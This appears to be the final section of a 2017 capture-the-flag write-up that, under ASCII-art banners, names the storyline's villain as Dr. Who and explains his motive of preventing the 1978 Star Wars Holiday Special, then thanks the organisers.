*/T/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\T\* */|/ ______ ___ ______ ___________ _____ \|\* */|/ | _ \ / \ | _ \ |___ ____| | __| _ \|\* */|/ | |_] | / _ \ | |_] | | | | |__ |_| \|\* */|/ | ___/ / /_\ \ | / | | |____ \ _ \|\* */|/ | | / _____ \ | |\ \____ | | _______} | |_| \|\* */|/ |__| /__/ \__\ |__| \______| |__| |_________/ \|\* */|/ \|\* */|/ ---- Discombobulated Audio ---- \|\* */|/_____________________________________________________________________\|\* */|\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/|\* 9) Who is the villain behind the nefarious plot. The audio from the files is: Father Christmas, Santa Claus. Or, as I've always known him, Jeff. I initially only understood part of that. Also the exact syntax wasn't known from the files. The websocket traffic to the game however reveiled a character named Dr. Who. Together with the parts of the passphrase, that I had, google helped with the rest. The villain is Dr. Who. 10) Why had the villain abducted Santa? The villain wanted to prevent the release of the 1978 Star Wars Holiday Special. He didn't like it very much. Or as he said it: I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here. He heard that Santa's 'North Pole Wonderland Magick' could prevent the Star Wars Special from being released. But Santa didn't want to mess with the universe's timeline and so he 'had to' kidnapp Santa. ____________________________________________________________________________________________ */T/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\*/\T\* */|/ ___________ __ __ ______ ______ __ ____ _______ \|\* */|/ |___ ____| | | | | | ___| | ___| | \ | _| |_ \ \|\* */|/ | | | |__| | | |__ | |__ | \| | | |\ | \|\* */|/ | | | __ | | __| | __| | | | | | | \|\* */|/ | | | | | | | |_______ | |____ | |\ | ____| |/ | \|\* */|/ |__| |__| |__| |__________| |_______| |__| \__| |__________/ \|\* */|/ \|\* */|/ ---- Thanks to everyone for the awesome challenge ---- \|\* */|/____________________________________________________________________________________\|\* */|\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/*\/|\*
Denis Werner
09.01.2017

zurück